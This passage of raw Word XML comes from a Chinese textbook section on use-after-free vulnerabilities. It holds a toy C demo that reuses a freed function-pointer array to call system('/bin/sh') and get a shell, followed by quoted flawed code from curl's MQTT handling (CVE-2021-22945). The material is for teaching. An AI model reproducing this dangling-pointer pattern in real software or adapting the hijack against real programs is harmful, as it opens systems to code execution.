          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UAF漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE543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UAF漏洞利用的核心是野指针重新赋值，若野指针被攻击者利用，则可以利用UAF漏洞实现攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050DEA1"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59797F82"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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D80D6"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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E446B7"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typedef void (*func_ptr)(char *);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79C46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void evil_fuc(char command[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597183CE"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72DA597D"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system(command);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA80094"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712B0474"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void echo(char content[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56DC6A"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1152952B"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printf("%s",content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831511D"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07018BB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int main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615AD96E"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75542FE4"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func_ptr *p1=(func_ptr*)malloc(4*sizeof(int));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE435A"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printf("malloc addr: %p\n",p1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AA18C"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p1[3]=echo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25844723"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p1[3]("hello world\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA9C3E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 xml:space="preserve">    free(p1); //在这里free了p1,但并未将p1置空,导致后续可以再使用p1指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE86D6"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 xml:space="preserve">    p1[3]("hello again\n"); //p1指针未被置空,虽然free了,但仍可使用.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B177F81"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 xml:space="preserve">    func_ptr *p2=(func_ptr*)malloc(4*sizeof(int));//malloc在free一块内存后,再次申请同样大小的指针会把刚刚释放的内存分配出来.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8367C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printf("malloc addr: %p\n",p2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3231E9"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 xml:space="preserve">    printf("malloc addr: %p\n",p1);//p2与p1指针指向的内存为同一地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B19CF3"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 xml:space="preserve">    p2[3]=evil_fuc; //这里将p1指针里面保存的echo函数指针覆盖成为了evil_func指针.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDEDFEE"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p1[3]("/bin/sh");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54419C81"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DE231"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397B7021"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观察以上代码，p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>func_ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针，指向一个长度为4的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>func_ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组头部，数组元素为函数地址，将数组最后一个元素p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址，运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>p1[3](</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk95896683"/>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>"hello world\n"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将调用echo函数打印</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>"hello world\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串。执行free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数后，由于申请的内存小于2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KB，内存分配器并未将该段内存释放回内核，而p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未被赋值为NULL，成为野指针，此时内存的数据仍然存在，调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>p1[3]("hello again\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍可打印字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89856B"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重新申请同样大小的内存赋值给p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此时p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向相同的内存块，p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被赋值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>evil_func</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址，由于p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向相同的内存块，执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>p1[3]("/bin/sh");</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>evil_fuc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数获得shell，以上代码执行效果如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D0352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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DEF0405" wp14:editId="157A0185">
            <wp:extent cx="5274310" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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59230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73933C54"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hint="eastAsia"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E60B1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75506201"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>真实程序中的UAF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCBC5F"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UAF漏洞也广泛存在于真实世界的程序，如CVE-2021-22945，这个UAF漏洞存在于MQTT协议中。MQTT(MQ Telemetry Transport) 消息队列遥测传输协议是IBM开发的一种网络应用层的协议，提供轻量级的，支持可发布/可订阅的的消息推送模式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746353A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这一漏洞出现在mqtt协议的mqtt_doing函数中，如 所示。其中nsend和sendleftover是发送失败后的标识符和指针，当消息发送失败后nsend会被设置为1，而sendleftover会被指向发送失败的内存地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D81B8"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mq-&gt;sendleftovers在被释放后指针并没有置为NULL，如果mqtt_doing被重复调用，这可能会到导致数据泄露和mq-&gt;sendleftover的二次释放。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6251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noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04990CA8" wp14:editId="7E874B7D">
                <wp:extent cx="5231081" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>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081" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5EBDA9B9" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.11</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D250443" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>if(mq-&gt;nsend){</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="002140F5"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rPr>
                              <w:t>char *ptr=mq-&gt;sendleftovers;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16C5967A"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rPr>
                              <w:t>result=mqtt_send(data,mq-&gt;sendleftovers,mq-&gt;nsend);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="352A84E3"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rPr>
                              <w:t>free(ptr);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B38D402"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>i</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>f(result)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0E2A3116" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLine="851"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>return result;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="03A9E31A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DF7FD3">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>}</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="04990CA8" id="_x0000_s1151" type="#_x0000_t202" style="width:41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tyFAIAAP8DAAAOAAAAZHJzL2Uyb0RvYy54bWysk99u2yAUxu8n7R0Q94vtNOlSK07Vpcs0&#10;qfsjdXsAgnGMhjnsQGJnT98DTtOou5vmCwQ+8HHO73wsb4fOsINCr8FWvJjknCkrodZ2V/GfPzbv&#10;Fpz5IGwtDFhV8aPy/Hb19s2yd6WaQgumVshIxPqydxVvQ3BllnnZqk74CThlKdgAdiLQEndZjaIn&#10;9c5k0zy/znrA2iFI5T39vR+DfJX0m0bJ8K1pvArMVJxyC2nENG7jmK2WotyhcK2WpzTEP2TRCW3p&#10;0rPUvQiC7VH/JdVpieChCRMJXQZNo6VKNVA1Rf6qmsdWOJVqITjenTH5/ycrvx4e3XdkYfgAAzUw&#10;FeHdA8hfnllYt8Lu1B0i9K0SNV1cRGRZ73x5OhpR+9JHkW3/BWpqstgHSEJDg12kQnUyUqcGHM/Q&#10;1RCYpJ/z6VWRLwrOJMWKWT67nqa2ZKJ8Pu7Qh08KOhYnFUfqapIXhwcfYjqifN4Sb/NgdL3RxqQF&#10;7rZrg+wgyAGb9KUKXm0zlvUVv5lP50nZQjyfzNHpQA41uqv4Io/f6JmI46Ot05YgtBnnlImxJz4R&#10;yQgnDNuB6Zr0r+LhyGsL9ZGIIYyOpBdEkxbwD2c9ubHi/vdeoOLMfLZE/aaYzaJ902I2f0+IGF5G&#10;tpcRYSVJVTxwNk7XIVk+8XB31J2NTtxeMjnlTC5LOE8vItr4cp12vbzb1RMAAAD//wMAUEsDBBQA&#10;BgAIAAAAIQCJL1rI2wAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqBMj&#10;qirEqSokLqgHWjhw3MZLnCa2Q+y04e9ZuNDLSqsZzbwp17PrxYnG2AavIV9kIMjXwbS+0fD+9ny3&#10;AhETeoN98KThmyKsq+urEgsTzn5Hp31qBIf4WKAGm9JQSBlrSw7jIgzkWfsMo8PE79hIM+KZw10v&#10;VZYtpcPWc4PFgZ4s1d1+clyyjfW0C1/HfNvJD9st8eHVvmh9ezNvHkEkmtO/GX7xGR0qZjqEyZso&#10;eg08JP1d1lbqnmccNCiVK5BVKS/pqx8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEA&#10;ABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h&#10;/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA3dI7&#10;chQCAAD/AwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;iS9ayNsAAAAFAQAADwAAAAAAAAAAAAAAAABuBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAAHYFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="5EBDA9B9" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.11</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D250443" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>if(mq-&gt;nsend){</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="002140F5"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rPr>
                        <w:t>char *ptr=mq-&gt;sendleftovers;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16C5967A"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rPr>
                        <w:t>result=mqtt_send(data,mq-&gt;sendleftovers,mq-&gt;nsend);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="352A84E3"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rPr>
                        <w:t>free(ptr);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3B38D402" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>i</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>f(result)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0E2A3116" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="851"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>return result;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="03A9E31A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00DF7FD3" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
